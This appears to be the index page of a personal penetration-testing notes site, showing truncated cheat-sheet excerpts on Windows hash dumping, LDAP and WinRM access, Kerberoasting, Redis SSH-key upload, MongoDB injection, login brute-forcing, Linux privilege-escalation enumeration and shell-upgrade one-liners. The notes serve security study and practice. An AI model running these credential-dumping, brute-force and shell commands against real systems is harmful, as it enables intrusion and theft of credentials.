Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…
It is possible to write as a user arbitrary text into the logs. Messages can be faked which could alert persons/surveillance systems. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic
Ports: ldap 389/tcp ldaps 636/tcp globalldap/globalcatldap 3268/tcp globalldaps/globalcatldapssl 3269/tcp Enumerate without credentials Nmap enumeration scans nmap -n -sV --script "ldap* and not brute" $target Ldapsearch scan ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Connect to LDAPs/GlobalLDAPs: openssl s_client -connect $target:636 </dev/null openssl s_client -connect $target:3269 </dev/null Search in the directory: ldapsearch -x -b…
Create a session tmux new -s <name>
Powershell Cmdlets consist out of Verb-Method. To search for a method, type Get-Command New-U* To see all attributes for a Cmdlet, type Get-LocalUser | Get-Member To see specific or non-default attributes, type Get-LocalUser | Select-Object -Property Name,PasswordRequired Examples Directories and files Get all files in the current directory. Get-ChildItem Get all files in the current directory and below.…
Windows Remote Management (WinRM / wsman) is a service which runs on port 5985 and 5986. Evil Winrm Github | Opens a shell for a user root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!' For many users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut -d ',' -f 1) password=$(echo $cred | cut -d ',' -f…
Basics Authentication sequence for a user to log in on a domain (controller): Authentication sequence for an authenticated user on a local system: Terminology Kerberoasting means offline cracking of the password from the NTLM hash. Useless if the service runs as a service user. Then, the password will be replaced by a 128 character long…
Runs on port 6379 — needs a full nmap scan! If a connection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…
Convert a Python2 script into a Python3 script: 2to3 -w example.py Fix tab/space/indentation problems: autopep8 -i linuxprivchecker.py If a library is installed, but cannot be found from smb.SMBConnection import SMBConnection then try to search the file locally and include the path manually: import sys; sys.path.append("path/to/your/file") Oneliner for executing bash in a file: echo 'import os;os.system("/bin/bash")' > /tmp/e.py Execute something:…
Connect from the command line mongo 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace' Show databases show dbs Switch to database use <db> Show all collections (“tables”) show collections Show all entries from a collection db.<collection>.find() Add a document db.products.insert( { item: "card", qty: 15 } ) Injections Show all records of the current table, assuming there is a WHERE clause for one field.…
On the client: root@raspberrypi:/etc/apt# cat apt.conf Acquire::http::Proxy "http://10.10.14.38:3128"; On the proxy:
Cross-compiling for 32/64 bit systems sudo apt-get install gcc-multilib gcc -m32 datei.c Tip: Add -static for a static binary. Note that you need to install packages for the target platform, e.g. apt install gcc-i686-linux-gnu. Cross-compiling for Windows Install the packages like apt install gcc-mingw-w64. Then use x86_64-w64-mingw32-gcc execute.c -o execute.exe. Disable security features You can…
Brute force is possible with nmap: # nmap --script vnc-brute -p 5900 localhost For TightVNC, use vncpwd to break passwords. A password can be obtained via reg query HKLM\Software\TightVNC\Server\ /v Password
1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…
With distccd you can compile remotely.
Tools to detect nmap -O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could be sent back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
Enumeration Mandatory Optional On Windows
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
Afterwards: See Analyzing memory Linux process memory dump Find out which memory segments are used by an application via its PID: cat /proc/<pid>/maps Dump the used memory from an application: (credit) #!/bin/bash grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | while read start stop; do \ gdb --batch --pid $1 -ex \…
https://github.com/Tib3rius/AutoRecon Multi recon tool for broad scanning
Personal collection of some infosec stuff. The primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';